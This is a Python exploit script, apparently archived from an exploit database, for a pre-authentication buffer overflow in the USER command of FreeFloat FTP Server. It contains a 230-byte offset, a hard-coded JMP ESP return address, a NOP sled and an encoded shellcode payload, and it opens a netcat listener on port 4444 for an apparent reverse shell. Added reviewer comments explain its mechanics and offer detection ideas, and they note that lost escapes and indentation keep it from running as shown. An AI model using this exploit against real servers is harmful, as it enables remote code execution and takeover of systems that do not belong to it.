# Title : Free Float FTP Server USER Command Buffer Overflow
# Published : 2012-12-09
# Author :
#Exploit title: FreeFloat FTP Server Remote Command Execution USER Command Buffer Overflow
#Date: 06/12/2012
#Exploit Author: D35m0nd142
#Vendor Homepage: http://www.freefoat.com
#Tested on Windows XP SP3 with Ubuntu 12.04
#!/usr/bin/python
import socket,sys,time,os
import Tkinter,tkMessageBox
# Clear the terminal before the GUI starts; this shells out to the `clear`
# command, so it has an effect only where that command exists.
os.system("clear")
# Callback for the GUI button: sends one over-long FTP USER command to the
# address typed into the `ip` entry field (TCP port 21), then starts a local
# netcat listener on port 4444.
# NOTE(review): this copy has lost its indentation and the backslashes of its
# string escapes ("x41", "rn", "nn"), so it does not run as shown.
# Defender view: the command is sent right after the greeting, before any
# login, so the exposure is pre-authentication. A USER argument hundreds of
# bytes long is never a legitimate username, which makes argument length a
# practical signature for network detection or a limit at an FTP-aware proxy.
def exploit():
# Target host comes from the Tkinter StringVar `ip` defined at module level.
target = ip.get()
# Filler up to the saved return address; the author gives the offset as 230.
junk = "x41" * 230 # Offset Number --> 230
# Hard-coded return address (author's note: a JMP ESP at 0x7E379353).
# NOTE(review): presumably inside a system DLL of the tested Windows XP SP3
# build -- confirm. A fixed address only holds where that module always loads
# at the same base, which is the assumption ASLR removes; running the bytes
# that follow from the stack is what DEP is meant to stop.
eip = "x53x93x37x7E" # 0x7E379353 FFE4 JMP ESP
# Padding placed between the return address and the payload.
nops = "x90" * 20
# Opaque encoded payload bytes supplied by the author; not decoded in this
# review. NOTE(review): the listener on port 4444 below suggests the payload
# connects back to the sender -- confirm before basing egress rules on it.
payload =("xb8xe9x78x9dxdbxdaxd2xd9x74x24xf4x5ex2bxc9" +
"xb1x4fx31x46x14x83xc6x04x03x46x10x0bx8dx61" +
"x33x42x6ex9axc4x34xe6x7fxf5x66x9cxf4xa4xb6" +
"xd6x59x45x3dxbax49xdex33x13x7dx57xf9x45xb0" +
"x68xccx49x1exaax4fx36x5dxffxafx07xaexf2xae" +
"x40xd3xfdxe2x19x9fxacx12x2dxddx6cx13xe1x69" +
"xccx6bx84xaexb9xc1x87xfex12x5excfxe6x19x38" +
"xf0x17xcdx5bxccx5ex7axafxa6x60xaaxfex47x53" +
"x92xacx79x5bx1fxadxbex5cxc0xd8xb4x9ex7dxda" +
"x0exdcx59x6fx93x46x29xd7x77x76xfex81xfcx74" +
"x4bxc6x5bx99x4ax0bxd0xa5xc7xaax37x2cx93x88" +
"x93x74x47xb1x82xd0x26xcexd5xbdx97x6ax9dx2c" +
"xc3x0cxfcx38x20x22xffxb8x2ex35x8cx8axf1xed" +
"x1axa7x7ax2bxdcxc8x50x8bx72x37x5bxebx5bxfc" +
"x0fxbbxf3xd5x2fx50x04xd9xe5xf6x54x75x56xb6" +
"x04x35x06x5ex4fxbax79x7ex70x10x0cxb9xe7x5b" +
"xa7x44x78x33xbax46x69x98x33xa0xe3x30x12x7b" +
"x9cxa9x3fxf7x3dx35xeax9fxdexa4x71x5fxa8xd4" +
"x2dx08xfdx2bx24xdcx13x15x9exc2xe9xc3xd9x46" +
"x36x30xe7x47xbbx0cxc3x57x05x8cx4fx03xd9xdb" +
"x19xfdx9fxb5xebx57x76x69xa2x3fx0fx41x75x39" +
"x10x8cx03xa5xa1x79x52xdax0exeex52xa3x72x8e" +
"x9dx7ex37xbexd7x22x1ex57xbexb7x22x3ax41x62" +
"x60x43xc2x86x19xb0xdaxe3x1cxfcx5cx18x6dx6d" +
"x09x1exc2x8ex18")
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
sock.connect((target,21))
print "nn[-] Sending exploit ..."
# Read and print the server greeting before sending anything.
print sock.recv(2000)
# The whole buffer goes out as the argument of a single USER command.
sock.send("USER "+junk+eip+nops+payload+"rn")
sock.close()
# Synchronous call: this callback, and with it the Tk event loop, is blocked
# until nc exits.
os.system("nc -lvp 4444")
# Bare except: any error raised in the try body, not only a failed connect,
# is reported as a connection failure, and the process then exits with
# status 0.
except:
print "[-] Connection to "+target+" failed! n"
sys.exit(0)
# Build the Tkinter (Python 2) window: a label, a text entry bound to the
# StringVar `ip`, and a button that invokes exploit() with whatever address
# was typed. The address is passed on without any validation.
root=Tkinter.Tk()
root.geometry("%dx%d" %(700,375))
root.title("*** FreeFloat FTP Server Remote Code Execution USER Command Buffer Overflow***")
root['bg'] = 'black'
# .pack() returns None, so `developer`, `ip_answer` and `ip_entry` all end up
# holding None rather than the widgets; the widgets themselves still exist.
developer=Tkinter.Label(text="Developed by D35m0nd142").pack(side='bottom')
ip_answer=Tkinter.Label(text="IP Address ").pack()
# exploit() reads the target address from this variable via ip.get().
ip=Tkinter.StringVar()
ip_entry=Tkinter.Entry(textvariable=ip).pack()
# The button captures the exploit function as its command first; the
# assignment then rebinds the module-level name `exploit` to None.
exploit=Tkinter.Button(text="Exploit",command=exploit).pack()
# Hand control to the Tk event loop until the window is closed.
root.mainloop()